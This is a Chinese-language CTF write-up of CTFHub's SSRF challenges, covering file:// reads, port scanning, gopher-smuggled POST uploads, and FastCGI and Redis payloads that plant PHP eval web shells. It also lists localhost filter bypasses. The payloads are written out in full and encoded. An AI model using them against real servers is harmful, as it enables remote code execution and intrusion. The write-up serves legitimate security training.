CTFHub Web SSRF

1. SSRF

1.1. 内网访问

访问 [http://127.0.0.1/flag.php](http://127.0.0.1/flag.php)

1.2. 伪协议读取文件

http://127.0.0.1/flag.php

读取到？？？说明文件存在

php://filter/read=convert.base64-encode/resource=http://127.0.0.1/flag.php
#都失败，尝试file 以绝对路径读取
file:///var/www/html/flag.php
# 成功读取

1.3. 端口扫描

dict://127.0.0.1:8080

bp 抓包设置 payload

8586 有报错响应

1.4. POST 请求

http://127.0.0.1/flag.php

填入 key 提交

URL 二次编码，第一次 URL 编码后将 %0A 替换为 %0D0A

POST%2520%252Fflag.php%2520HTTP%252F1.1%250D%250AHost%253A%2520challenge-a4e82c2602cbeef6.sandbox.ctfhub.com%253A10800%250D%250AUser-Agent%253A%2520Mozilla%252F5.0%2520(Windows%2520NT%252010.0%253B%2520Win64%253B%2520x64%253B%2520rv%253A140.0)%2520Gecko%252F20100101%2520Firefox%252F140.0%250D%250AAccept%253A%2520text%252Fhtml%252Capplication%252Fxhtml%252Bxml%252Capplication%252Fxml%253Bq%253D0.9%252C*%252F*%253Bq%253D0.8%250D%250AAccept-Language%253A%2520zh-CN%252Czh%253Bq%253D0.8%252Czh-TW%253Bq%253D0.7%252Czh-HK%253Bq%253D0.5%252Cen-US%253Bq%253D0.3%252Cen%253Bq%253D0.2%250D%250AAccept-Encoding%253A%2520gzip%252C%2520deflate%250D%250AContent-Type%253A%2520application%252Fx-www-form-urlencoded%250D%250AContent-Length%253A%252036%250D%250AOrigin%253A%2520http%253A%252F%252Fchallenge-a4e82c2602cbeef6.sandbox.ctfhub.com%253A10800%250D%250AConnection%253A%2520close%250D%250AReferer%253A%2520http%253A%252F%252Fchallenge-a4e82c2602cbeef6.sandbox.ctfhub.com%253A10800%252F%253Furl%253D127.0.0.1%252Fflag.php%250D%250AUpgrade-Insecure-Requests%253A%25201%250D%250APriority%253A%2520u%253D0%252C%2520i%250D%250A%250D%250Akey%253Df16bc01bbf8a2ebfca9d9f7a01b7947e

1.5. 上传文件

添加 submit，提交 bp 抓包

第一次 URL 编码，并将 %0A 替换为 %0D0A

POST%20%2Fflag.php%20HTTP%2F1.1%0D%0AHost%3A%20challenge-b9fff0bf1f4b1a36.sandbox.ctfhub.com%3A10800%0D%0AUser-Agent%3A%20Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64%3B%20rv%3A140.0)%20Gecko%2F20100101%20Firefox%2F140.0%0D%0AAccept%3A%20text%2Fhtml%2Capplication%2Fxhtml%2Bxml%2Capplication%2Fxml%3Bq%3D0.9%2C*%2F*%3Bq%3D0.8%0D%0AAccept-Language%3A%20zh-CN%2Czh%3Bq%3D0.8%2Czh-TW%3Bq%3D0.7%2Czh-HK%3Bq%3D0.5%2Cen-US%3Bq%3D0.3%2Cen%3Bq%3D0.2%0D%0AAccept-Encoding%3A%20gzip%2C%20deflate%0D%0AContent-Type%3A%20multipart%2Fform-data%3B%20boundary%3D----geckoformboundary51834e26d074966e704b418761d460d1%0D%0AContent-Length%3A%20266%0D%0AOrigin%3A%20http%3A%2F%2Fchallenge-b9fff0bf1f4b1a36.sandbox.ctfhub.com%3A10800%0D%0AConnection%3A%20close%0D%0AReferer%3A%20http%3A%2F%2Fchallenge-b9fff0bf1f4b1a36.sandbox.ctfhub.com%3A10800%2F%3Furl%3D127.0.0.1%2Fflag.php%0D%0AUpgrade-Insecure-Requests%3A%201%0D%0APriority%3A%20u%3D0%2C%20i%0D%0A%0D%0A------geckoformboundary51834e26d074966e704b418761d460d1%0D%0AContent-Disposition%3A%20form-data%3B%20name%3D%22file%22%3B%20filename%3D%22shell.php%22%0D%0AContent-Type%3A%20application%2Foctet-stream%0D%0A%0D%0A%3C%3Fphp%20echo%20123%3B%40eval(%24_POST%5B'code'%5D)%3B%3F%3E%0D%0A------geckoformboundary51834e26d074966e704b418761d460d1--

第二次 URL 编码

POST%2520%252Fflag.php%2520HTTP%252F1.1%250D%250AHost%253A%2520challenge-b9fff0bf1f4b1a36.sandbox.ctfhub.com%253A10800%250D%250AUser-Agent%253A%2520Mozilla%252F5.0%2520(Windows%2520NT%252010.0%253B%2520Win64%253B%2520x64%253B%2520rv%253A140.0)%2520Gecko%252F20100101%2520Firefox%252F140.0%250D%250AAccept%253A%2520text%252Fhtml%252Capplication%252Fxhtml%252Bxml%252Capplication%252Fxml%253Bq%253D0.9%252C*%252F*%253Bq%253D0.8%250D%250AAccept-Language%253A%2520zh-CN%252Czh%253Bq%253D0.8%252Czh-TW%253Bq%253D0.7%252Czh-HK%253Bq%253D0.5%252Cen-US%253Bq%253D0.3%252Cen%253Bq%253D0.2%250D%250AAccept-Encoding%253A%2520gzip%252C%2520deflate%250D%250AContent-Type%253A%2520multipart%252Fform-data%253B%2520boundary%253D----geckoformboundary51834e26d074966e704b418761d460d1%250D%250AContent-Length%253A%2520266%250D%250AOrigin%253A%2520http%253A%252F%252Fchallenge-b9fff0bf1f4b1a36.sandbox.ctfhub.com%253A10800%250D%250AConnection%253A%2520close%250D%250AReferer%253A%2520http%253A%252F%252Fchallenge-b9fff0bf1f4b1a36.sandbox.ctfhub.com%253A10800%252F%253Furl%253D127.0.0.1%252Fflag.php%250D%250AUpgrade-Insecure-Requests%253A%25201%250D%250APriority%253A%2520u%253D0%252C%2520i%250D%250A%250D%250A------geckoformboundary51834e26d074966e704b418761d460d1%250D%250AContent-Disposition%253A%2520form-data%253B%2520name%253D%2522file%2522%253B%2520filename%253D%2522shell.php%2522%250D%250AContent-Type%253A%2520application%252Foctet-stream%250D%250A%250D%250A%253C%253Fphp%2520echo%2520123%253B%2540eval(%2524_POST%255B'code'%255D)%253B%253F%253E%250D%250A------geckoformboundary51834e26d074966e704b418761d460d1--

成功

1.6. FastCGI 协议

安装 gopherus

git clone https://github.com/tarunkant/Gopherus.git
wget https://bootstrap.pypa.io/pip/2.7/get-pip.py
python2 get-pip.py
./install.sh

生成 exploit

python2 gopherus.py --exploit fastcgi
/var/www/html/index.php
echo PD9waHAgZXZhbCgkX1BPU1RbJ2NvZGUnXSk7Pz4= | base64 -d >/var/www/html/shell.php

进行一次 URL 编码

_%2501%2501%2500%2501%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504%2500%2501%2501%2505%2505%2500%250F%2510SERVER_SOFTWAREgo%2520%2F%2520fcgiclient%2520%250B%2509REMOTE_ADDR127.0.0.1%250F%2508SERVER_PROTOCOLHTTP%2F1.1%250E%2503CONTENT_LENGTH134%250E%2504REQUEST_METHODPOST%2509KPHP_VALUEallow_url_include%2520%253D%2520On%250Adisable_functions%2520%253D%2520%250Aauto_prepend_file%2520%253D%2520php%253A%2F%2Finput%250F%2517SCRIPT_FILENAME%2Fvar%2Fwww%2Fhtml%2Findex.php%250D%2501DOCUMENT_ROOT%2F%2500%2500%2500%2500%2500%2501%2504%2500%2501%2500%2500%2500%2500%2501%2505%2500%2501%2500%2586%2504%2500%253C%253Fphp%2520system%2528%2527echo%2520PD9waHAgZXZhbCgkX1BPU1RbJ2NvZGUnXSk7Pz4%253D%2520%257C%2520base64%2520-d%2520%253E%2Fvar%2Fwww%2Fhtml%2Fshell.php%2527%2529%253Bdie%2528%2527-----Made-by-SpyD3r-----%250A%2527%2529%253B%253F%253E%2500%2500%2500%2500

蚁剑连接 [http://challenge-ab6a103940705427.sandbox.ctfhub.com:10800/shell.php](http://challenge-ab6a103940705427.sandbox.ctfhub.com:10800/shell.php) 成功

1.7. Redis 协议

http://challenge-2330ba3a9a6a7458.sandbox.ctfhub.com:10800/?url=dict://127.0.0.1:6379

gopherus 生成 exploit

url 编码

gopher%3A%2F%2F127.0.0.1%3A6379%2F_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252434%250D%250A%250A%250A%253C%253Fphp%2520system%2528%2524_GET%255B%2527cmd%2527%255D%2529%253B%2520%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252413%250D%250A%2Fvar%2Fwww%2Fhtml%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A

响应返回 504，访问 shell.php 成功

http://challenge-2330ba3a9a6a7458.sandbox.ctfhub.com:10800/shell.php?cmd=ls

?cmd=ls /
?cmd=cat /flag_eb4d87188e48c82b40fe59e7eb88ee74

1.8. URL Bypass

?url=http://notfound.ctfhub.com@127.0.0.1/flag.php # 协议://user@url

1.9. 数字 IP Bypass

?url=http://localhost/flag.php

8进制格式：0177.0.0.1
16进制格式：0x7F.0.0.1
10进制整数格式：2130706433
16进制整数格式：0x7F000001

1.10. 302 跳转 Bypass

?url=http://localhost/flag.php

1.11. DNS 重绑定 Bypass

?url=http://www.baidu.com/index.html #可访问域名

添加 DNS A 记录为 127.0.0.1

?url=http://local.ghostliner.top/flag.php